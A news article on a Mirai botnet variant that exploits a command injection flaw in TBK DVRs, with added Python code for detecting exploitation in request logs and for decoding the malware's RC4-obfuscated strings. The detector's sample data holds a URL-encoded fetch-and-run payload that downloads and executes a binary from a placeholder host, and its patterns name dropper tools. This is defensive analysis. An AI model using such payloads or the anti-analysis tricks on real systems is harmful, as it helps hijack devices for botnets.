Mirai Botnet Variant is Building Swarm by Exploiting DVR Flaw

A command injection flaw in internet-connected digital video recorders (DVRs) used for CCTV monitoring is being exploited by a Mirai botnet variant, allowing attackers to take over the devices and enrol them in the botnet.

Researchers at the Russian security firm Kaspersky discovered exploitation of CVE-2024-3721 while analysing logs from their Linux honeypots. The issue is a command injection vulnerability in TBK-manufactured DVRs used for CCTV surveillance. Further analysis tied the activity to a Mirai botnet variant that exploits the flaw to compromise and control the devices.

The vulnerability was initially disclosed by security researcher "netsecfish" in April 2024, together with a proof-of-concept showing how a crafted POST request to a specific URL, with the mdb and mdc parameters adjusted, triggers shell command execution on the device. Kaspersky confirmed that this exact technique is being used in the wild: its Linux honeypots are catching ongoing exploitation attempts from a Mirai variant that reuses netsecfish's proof-of-concept to compromise vulnerable DVRs.
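As an added example, not from the page or from Kaspersky's tooling, here is a small Python detector of the kind that would surface these attempts in honeypot or web-server request logs. It keys on the mdb and mdc parameters named above rather than on a path, since the page does not give the vulnerable endpoint; the request paths, the 192.0.2.10 download host and the payloads in the sample set are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The two parameter names come from the page (netsecfish's PoC adjusts mdb and
# mdc). Sample paths and payloads below are constructed; the page does not give
# the vulnerable endpoint, so the detector keys on the parameters, not a path.
INJECTION_PARAMS = ("mdb", "mdc")

# Command separators / substitution an injected payload needs, and the helpers
# a Mirai-style dropper uses to fetch and launch its binary on the device.
SHELL_META = re.compile(r"[;|`]|\$\(|&&")
DROPPER_CMDS = re.compile(r"\b(wget|curl|tftp|busybox|chmod)\b|/bin/sh")


def parse_params(url: str, body: str) -> dict:
    """Merge query-string and form-encoded body parameters into one dict."""
    params: dict = {}
    for source in (urlsplit(url).query, body):
        for key, values in parse_qs(source, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    return params


def assess_request(method: str, url: str, body: str):
    """Grade one captured request.

    Returns (severity, reasons): 0 = nothing of interest, 1 = the injection
    parameters are present, 2 = they carry shell command content.
    """
    params = parse_params(url, body)
    present = [p for p in INJECTION_PARAMS if p in params]
    if not present:
        return 0, []
    reasons = [f"parameter {p!r} present" for p in present]
    severity = 1
    # Look at the decoded parameter values first, then at the raw body: a bot
    # that does not percent-encode ';' or '&&' would otherwise have its
    # payload split across several innocent-looking parameters.
    candidates = [v for p in present for v in params[p]] + [unquote(body)]
    for text in candidates:
        if SHELL_META.search(text) or DROPPER_CMDS.search(text):
            severity = 2
            reasons.append(f"shell command content: {text[:60]!r}")
            break
    if method.upper() != "POST":
        reasons.append(f"sent as {method.upper()} rather than the PoC's POST")
    return severity, reasons


def scan(requests):
    """Run assess_request over (method, url, body) tuples; return the hits."""
    hits = []
    for index, (method, url, body) in enumerate(requests):
        severity, reasons = assess_request(method, url, body)
        if severity:
            hits.append((index, severity, reasons))
    return hits


# Constructed sample of requests as a honeypot might record them. The path and
# the 192.0.2.10 download host are placeholders, not values from the page.
SAMPLE_REQUESTS = [
    ("GET", "/index.html", ""),
    ("POST", "/login.cgi", "user=admin&pass=admin"),
    ("POST", "/placeholder.cgi?opt=sys",
     "mdb=sos&mdc=cd%20%2Ftmp%3Bwget%20http%3A%2F%2F192.0.2.10%2Farm.bin%3B"
     "chmod%20777%20arm.bin%3B.%2Farm.bin"),
    ("POST", "/placeholder.cgi?opt=sys", "mdb=sos&mdc=ls"),
]

if __name__ == "__main__":
    for index, severity, reasons in scan(SAMPLE_REQUESTS):
        print(f"request {index}: severity {severity}: " + "; ".join(reasons))
```

The third sample request is graded 2 because its decoded mdc value chains commands with `;` and fetches a binary with wget; the fourth is only graded 1, since mdb/mdc are present but carry no separator or download helper. Checking the percent-decoded raw body as well as the parsed values catches bots that leave `;` or `&&` unencoded, which would otherwise be split by the form parser.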

Nearly a decade ago, the Mirai source code was leaked online by an anonymous poster, and it continues to serve as the foundation for new botnets. The variant targeting these DVRs extends the original code with RC4-based string obfuscation, virtual machine detection, and anti-emulation checks.

The attackers use the exploit to push a malicious ARM32 binary to the target device; once running, it connects to a command-and-control server and joins the botnet. Infected devices can then be used to launch distributed denial-of-service attacks, proxy malicious traffic, and carry out other malicious actions.

This Mirai variant uses a straightforward RC4 routine to decrypt its internal strings; the RC4 key itself is stored XOR-masked and is unmasked before use. Once decrypted, the strings are kept in a global list and referenced throughout runtime. To hinder analysis, the malware also performs anti-virtualization and anti-emulation checks, scanning the running processes for indicators of environments such as VMware or QEMU.
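As an added example (not the malware's code and not Kaspersky's tooling), here is the string-decoding scheme the paragraph describes, in Python: a plain RC4 routine, a key stored XOR-masked, a table of encrypted strings decrypted into a global list at start-up, and the process-name check that consumes some of those strings. The key, the mask byte and the string contents are placeholders standing in for what an analyst would lift from the real sample; the script builds the "as in the binary" table itself so that it runs offline.

```python
# RC4 string deobfuscation with an XOR-masked key, plus the process-name check
# the decoded strings feed. Key, mask byte and string table are constructed
# placeholders, not values recovered from the sample.

XOR_MASK = 0x37  # placeholder; the page only says the key is XOR-disguised
PLAIN_KEY = b"placeholder-key"
PLAINTEXT_STRINGS = [b"/proc/", b"vmware", b"qemu", b"/bin/busybox"]


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). The same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation + XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def unmask_key(masked: bytes) -> bytes:
    """Recover the RC4 key from its XOR-disguised form (XOR is its own inverse)."""
    return bytes(b ^ XOR_MASK for b in masked)


# What the binary would carry: the masked key and the RC4-encrypted strings.
MASKED_KEY = unmask_key(PLAIN_KEY)
ENCRYPTED_TABLE = [rc4_crypt(PLAIN_KEY, s) for s in PLAINTEXT_STRINGS]

# Analogue of the malware's global string list, filled once at start-up.
DECODED_STRINGS: list = []


def decode_table(masked_key: bytes, table) -> list:
    """Unmask the key, decrypt every entry and populate the global list."""
    key = unmask_key(masked_key)
    DECODED_STRINGS.clear()
    for blob in table:
        DECODED_STRINGS.append(rc4_crypt(key, blob).decode("latin-1"))
    return list(DECODED_STRINGS)


def looks_like_sandbox(process_names, indicators) -> bool:
    """Mirror the anti-VM/anti-emulation check: True if any running process
    name contains one of the decoded indicator strings (e.g. vmware, qemu)."""
    lowered = [name.lower() for name in process_names]
    return any(ind.lower() in name for ind in indicators for name in lowered)


if __name__ == "__main__":
    strings = decode_table(MASKED_KEY, ENCRYPTED_TABLE)
    print("decoded:", strings)
    print("sandbox:", looks_like_sandbox(["init", "qemu-arm", "sshd"], strings[1:3]))
```

For an analyst this scheme is weak by design: the masked key, the mask byte and the encrypted table all sit in the binary, so once the unmasking step is located in the disassembly the whole string table decrypts with the routine above, and the resulting strings (C2 hostnames, process-name indicators, command keywords) make good detection material.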

Last year netsecfish reported that around 114,000 DVRs were vulnerable to CVE-2024-3721; Kaspersky's own estimate is closer to 50,000. Most infections attributed to this Mirai variant are in Brazil, Russia, Egypt, China, India, and Ukraine.